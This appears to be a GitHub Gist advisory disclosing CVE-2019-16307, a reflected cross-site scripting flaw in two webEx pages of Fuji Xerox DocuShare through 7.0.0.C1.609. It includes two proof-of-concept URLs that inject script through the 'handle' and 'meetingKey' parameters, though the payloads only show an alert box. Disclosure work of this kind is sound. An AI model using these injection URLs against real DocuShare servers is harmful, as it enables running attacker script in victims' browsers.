Created
September 14, 2019 16:03
-
-
Save izadgot/3efc75f62f9c9567c8f11bad74165425 to your computer and use it in GitHub Desktop.
PoC A Reflected Cross-Site Scripting (XSS) vulnerability in the webEx module in webExMeetingLogin.jsp and deleteWebExMeetingCheck.jsp in Fuji Xerox DocuShare through 7.0.0.C1.609 (CVE-2019-16307)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Product Description] | |
Xerox DocuShare is enterprise content management (ECM) designed with usability, flexibility and convenience in mind. It helps knowledge workers be more efficient every day by focusing on the intersection of people, paper and processes – the lifeblood of today’s work environment. (Information from Humanica homepage) | |
[Details] | |
A Reflected Cross-Site Scripting (XSS) vulnerability in the webEx module in webExMeetingLogin.jsp and deleteWebExMeetingCheck.jsp in Fuji Xerox DocuShare through 7.0.0.C1.609 allows remote attackers to inject arbitrary web script or HTML via the "handle" parameter (webExMeetingLogin.jsp) and "meetingKey" parameter (deleteWebExMeetingCheck.jsp). | |
[Impact] | |
Running malicious web script or HTML script on victim's web browser. | |
[Affected component] | |
Fuji Xerox DocuShare through 7.0.0.C1.609 webEx module | |
[Attack Type] | |
Remote | |
[PoC] | |
1. webExMeetingLogin.jsp (insert javascript into "handle" parameter) | |
https://[target host]/[DocuShare path]/dsweb/webex/webExMeetingLogin.jsp?handle=asdasd%22;}}%3C/script%3E%3Cscript%3Ealert(`incognito%20lab`)%3C/script%3E | |
2. deleteWebExMeetingCheck.jsp (insert javascript into "meetingKey" parameter) | |
https://[target host]/[DocuShare path]/dsweb/webex/deleteWebExMeetingCheck.jsp?meetingKey=000001%22;}%3Cscript%3Ealert(%22Incognito%20Lab%22)%3C/script%3E; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment